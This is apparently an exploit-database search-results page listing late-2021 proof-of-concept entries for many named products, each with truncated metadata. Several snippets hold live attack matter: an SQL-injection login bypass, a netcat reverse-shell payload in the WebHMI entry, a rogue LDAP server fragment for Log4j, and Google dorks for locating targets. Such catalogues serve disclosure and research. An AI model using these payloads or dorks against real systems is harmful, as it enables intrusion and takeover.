47904 matches found
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Discovery by: Yehia Elghaly Date: 30-12-2021 Vendor Homepage: https://www.trigonesoft.com/ Software Link: https://www.trigonesoft.com/download/RemoteSystemmonitorServer3.61x86Setup.exe Tested Version: 3.61 Vulnerability Typ...
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection Authenticated Date: 30/12/2021 Exploit Author: twseptian Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Software Link:...
Hospitals Patient Records Management System 1.0 - Account TakeOver
Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver Date: 30/12/2021 Exploit Author: twseptian Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Software Link:...
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting XSS Unauthenticated Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" Date: 30/12/2021 Exploit Author: Malcrove Vendor Homepage: https://www.beyondtrust.com/ Version: v6.0 and earlier versions Summary:...
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution RCE Unauthenticated Date: 12/24/2021 Exploit Author: n0tme thatsn0tmysite Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ Vendor Homepage: https://www.terra-master.com/ Version: TOS 4.2.X 4.2.15-2107141517 Test...
Hostel Management System 2.1 - Cross Site Scripting (XSS)
Exploit Title: Hostel Management System 2.1 - Cross Site Scripting XSS Date: 26/12/2021 Exploit Author: Chinmay Vishwas Divekar Vendor Homepage: https://phpgurukul.com/hostel-management-system/ Software Link: https://phpgurukul.com/hostel-management-system/ Version: V 2.1 Tested on: PopOS20.10...
Nettmp NNT 5.1 - SQLi Authentication Bypass
Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass Date: 23/12/2021 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://wiki.nettemp.tk Software Link: https://wiki.nettemp.tk Version: nettmp NNT Tested on: Linux Ubuntu 20.04 Payload: username: 1' or 1=1;-- password: \ Proo...
AWebServer GhostBuilding 18 - Denial of Service (DoS)
Exploit Title: AWebServer GhostBuilding 18 - Denial of Service DoS Date: 28/12/2021 Exploit Author: Andres Ramos Invertebrado Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en Version: AWebServer...
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting XSS Google Dork: NA Date: 03-OCT-2021 Exploit Author: Akash Rajendra Patil Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php Software Link:...
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting XSS Date: 28/12/2021 Exploit Author: Momen Eldawakhly - Cyber Guy - Resecurity Inc Vendor Homepage: https://www.safarimontage.com/ Version: 8.3 and 8.5 Tested on: Ubuntu Linux Firefox CVE: CVE-2021-45425 Proof of Concept: GET...
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read Unauthenticated Date: 23/12/2021 Exploit Authors: Nicole Sheinin, Liad Levy Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ Versio...
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
Exploit Title: Online Admission System 1.0 - Remote Code Execution RCE Unauthenticated Date: 23/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System Software Link: https://github.com/rskoolrash/Online-Admission-System Tested on: LAMP Stack...
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting XSS Unauthenticated Date: 22/12/2021 Exploit Author: gx1 Vulnerability Discovery: Gaetano Perrone Vendor Homepage: https://www.crmperks.com/ Software Link: https://wordpress.org/plugins/contact-form-entries/ Version...
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: RiteCMS 3.1.0 - Remote Code Execution RCE Authenticated Date: 25/07/2021 Exploit Author: faisalfs10x https://github.com/faisalfs10x Vendor Homepage: https://ritecms.com/ Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip Version: = 3.1.0...
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion Authenticated Date: 25/07/2021 Exploit Author: faisalfs10x https://github.com/faisalfs10x Vendor Homepage: https://ritecms.com/ Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip Version: = 3.1.0...
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow DoS Discovered by: Yehia Elghaly Discovered Date: 22/12/2021 Vendor Homepage: https://www.accu-time.com/ Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ Tested Version: 1.0 Vulnerability Type:...
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
Exploit Title: Movie Rating System 1.0 - Broken Access Control Admin Account Creation Unauthenticated Date: 22/12/2021 Exploit Author: Tagoletta Tağmaç Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html Version: 1.0 Teste...
Automox Agent 32 - Local Privilege Escalation
Exploit Title: Automox Agent 32 - Local Privilege Escalation Date: 13/12/2021 Exploit Author: Greg Foss Writeup: https://www.lacework.com/blog/cve-2021-43326/ Vendor Homepage: https://www.automox.com/ Software Link: https://support.automox.com/help/agents Version: 31, 32, 33 Tested on: Windows 10...
ConnectWise Control 19.2.24707 - Username Enumeration
Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration Date: 17/12/2021 Exploit Author: Luca Cuzzolin aka czz78 Vendor Homepage: https://www.connectwise.com/ Version: vulnerable = 19.2.24707 CVE : CVE-2019-16516 https://github.com/czz/ScreenConnect-UserEnum from multiprocessing impo...
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure Date: 01/01/2022 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.vodafone.es/ Software Link: N/A Version: Firmware version Vodafone-H-500-s-v3.5.10 Hardware model: Sercomm VFH500 The WiFi access point password...
Exponent CMS 2.6 - Multiple Vulnerabilities
Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities Exploit Author: heinjame Date: 22/10/2021 Exploit Author: picaroo Vendor Homepage: https://www.exponentcms.org/ Version: http://127.0.0.1:8082/expcms/text/edit/id/id/src/@footer Title, Text Block Payload = " Database credential are...
WBCE CMS 1.5.1 - Admin Password Reset
Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset Google Dork: intext: "Way Better Content Editing" Date: 20/12/2021 Exploit Author: citril or https://github.com/maxway2021 Vendor Homepage: https://wbce.org/ Software Link: https://wbce.org/de/downloads/ Version: = 1.5.1 Tested on: Linux CVE :...
phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution RCE Unauthenticated Date: 18/12/2021 Exploit Author: Halit AKAYDIN hLtAkydn Vendor Homepage: https://www.phpkf.com/ Software Link: https://www.phpkf.com/indirme.php Version: 3.00 Category: Webapps Tested on: Linux/Windows phpKF-CMS; It...
Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery CSRF Date: November 29, 2021 Exploit Author: =LL= Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ Vendor Homepage: https://github.com/arunna Software Link:...
Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting XSS Date: 06/12/2021 Exploit Author: Enes Özeser Vendor Homepage: https://croogo.org/ Software Link: https://downloads.croogo.org/v3.0.2.zip Version: 3.0.2 Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==...
Croogo 3.0.2 - Unrestricted File Upload
Exploit Title: Croogo 3.0.2 - Unrestricted File Upload Date: 06/12/2021 Exploit Author: Enes Özeser Vendor Homepage: https://croogo.org/ Software Link: https://downloads.croogo.org/v3.0.2.zip Version: 3.0.2 Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 == 'setting-43'...
Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration Date: 13/12/2021 Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed Vendor Homepage: https://www.cybelesoft.com Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ Version: vulnerable v3.0 Tested on:...
Oliver Library Server v5 - Arbitrary File Download
Exploit Title: Oliver Library Server v5 - Arbitrary File Download Date: 14/12/2021 Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group Vendor Homepage: https://www.softlinkint.com/product/oliver/ Product: Oliver Server v5 Version: /oliver/FileServlet?source=serverFile&fileName= 2...
Apache Log4j2 2.14.1 - Information Disclosure
Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure Date: 12/12/2021 Exploit Author: leonjza Vendor Homepage: https://logging.apache.org/log4j/2.x/ Version: None: printf' i| new connection from self.clientaddress0' sock = self.request sock.recv1024 sock.sendallLDAPHEADER data =...
Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation macOS Exploit Author: leonjza Vendor Homepage: https://laravel.com/docs/8.x/valet Version: v1.1.4 to v2.0.3 !/usr/bin/env python2 Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation macOS February 2017 - @leonjza Affected version...
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution RCE Authenticated Vulnerability founder: AkkuS Date: 13/12/2021 Exploit Author: 0sunday Vendor Homepage: https://www.bookedscheduler.com/ Software Link: N/A Version: Booked Scheduler 2.7.5 Tester on: Kali 2021.2 CVE: CVE-2019-9581...
Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery CSRF Date: 13/12/2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.axesstmc.com/cloki/ !-- Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control Vendor: Zucchetti Axess S.p.A. Product...
Apache Log4j 2 - Remote Code Execution (RCE)
Exploit Title: Apache Log4j 2 - Remote Code Execution RCE Date: 11/12/2021 Exploit Authors: kozmer, z9fr, svmorris Vendor Homepage: https://logging.apache.org/log4j/2.x/ Software Link: https://github.com/apache/logging-log4j2 Version: versions 2.0-beta-9 and 2.14.1. Tested on: Linux CVE:...
Microsoft Internet Explorer / ActiveX Control - Security Bypass
Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass Exploit Author: John Page aka hyp3rlinx Website: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt twitter.com/hyp3rlinx ISR:...
Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass Exploit Author: Yehia Elghaly YME Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html Version: Onli...
meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: meterN v1.2.3 - Remote Code Execution RCE Authenticated Date: 18/11/2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.metern.org !-- meterN v1.2.3 Authenticated Remote Command Execution Vulnerability Vendor: Jean-Marc Louviaux Product web page: https://www.metern.org...
WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting XSS Authenticated Date: 29/11/2021 Exploit Author: Mansi Singh Vendor Homepage: https://wordpress.org/plugins/typebot/ Software Link: https://wordpress.org/plugins/typebot/ Tested on Windows Reference:...
HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion LFI Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" Date: 11/12/2021 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: N/A Version: V2.0 Tested on: Nginx NVRDVRIPC Web Server Proof of...
WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Date: 12/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" +...
OpenCATS 0.9.4 - Remote Code Execution (RCE)
Exploit Title: OpenCATS 0.9.4 - Remote Code Execution RCE Google Dork: intext:"Current Available Openings, Recently Posted Jobs" Date: 21/09/2021 Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar Vendor Homepage: https://www.opencats.org/ Software Link:...
Free School Management Software 1.0 - Remote Code Execution (RCE)
Exploit Title: Free School Management Software 1.0 - Remote Code Execution RCE Exploit Author: fuuzap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...
Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting XSS Exploit Author: fuzzyap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...
Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)
Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution RCE Authenticated Date: 03/12/2021 Exploit Author: 0z09e https://twitter.com/0z09e Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ Software Link:...
MTPutty 1.0.1.21 - SSH Password Disclosure
Exploit Title: MTPutty 1.0.1.21 - SSH Password Disclosure Exploit Author: Sedat Ozdemir Version: 1.0.1.21 Date: 06/12/2021 Vendor Homepage: https://ttyplus.com/multi-tabbed-putty/ Tested on: Windows 10 Proof of Concept ================ Step 1: Open MTPutty and add a new SSH connection. Step 2:...
Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting XSS Exploit Author: able403 Date: 08/12/2021 Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html Software Link:...
Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution RCE Authenticated Date 07.12.2021 Exploit Author: Ron Jost Hacker5preme Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/ Software Link:...
Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass
Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Exploit Author: able403 Date: 08/12/2021 Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html Software Link:...
LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution RCE Authenticated Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login Date: 05/12/2021 Exploit Author: Y1LD1R1M Vendor Homepage: https://www.limesurvey.org/ Software Link:...
TestLink 1.19 - Arbitrary File Download (Unauthenticated)
Exploit Title: TestLink 1.19 - Arbitrary File Download Unauthenticated Google Dork: inurl:/testlink/ Date: 07/12/2021 Exploit Author: Gonzalo Villegas Cl34r Exploit Author Homepage: https://nch.ninja Vendor Homepage: https://testlink.org/ Version:1.16 = 1.19 CVSS:...
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Date: 08/12/2021 Exploit Author: s1gh Vendor Homepage: https://grafana.com/ Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p Version: V8.0.0-beta1 through V8.3.0 Description...